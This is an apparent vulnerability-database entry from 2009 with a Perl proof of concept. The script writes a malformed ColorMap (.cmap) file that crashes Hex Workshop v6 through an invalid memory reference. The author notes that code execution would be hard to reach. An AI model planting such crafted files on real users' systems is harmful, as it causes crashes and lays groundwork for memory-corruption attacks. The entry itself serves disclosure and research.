Hex Workshop v6 "ColorMap files .cmap" Invalid Memory Reference crash POC

2009.02.04
Credit: DATA_SNIPER
Risk: Low
Local: No
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/perl -w # Hex Workshop v6 "ColorMap files .cmap" Invalid Memory Reference crash POC # Discovred by : DATA_SNIPER # for more information vist my blog:http://datasniper.arab4services.net/ # the Exploit it's very hard to implemented,if we can make the "reference" point to valid memory location contain # unicode string we can corrupt the memory and get code execution(it's not so easy as you can see,try it manually in olly). print "==========================================================================\n"; print "Hex Workshop v6 (ColorMap files .cmap) Invalid Memory Reference crash POC\n"; print "Discovred by DATA_SNIPER\n"; print "Greetz to: arab4services team and AT4RE Team\n"; print "===================================================================== \n"; my $crash = '#Simple POC by DATA_SNIPER'."\n".'"%s"= RGB(0, 0, 0)'; #don't worry about it ,it's not Format string bug :) my $file = "cr4sh.cmap" ; open(my $data, ">>$file") or die "Cannot open $file"; print $data $crash; close($data); print "$file has been created\n"; print "open it in HexWorkshop.\n";

References:

http://seclists.org/bugtraq/2009/Feb/0009.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top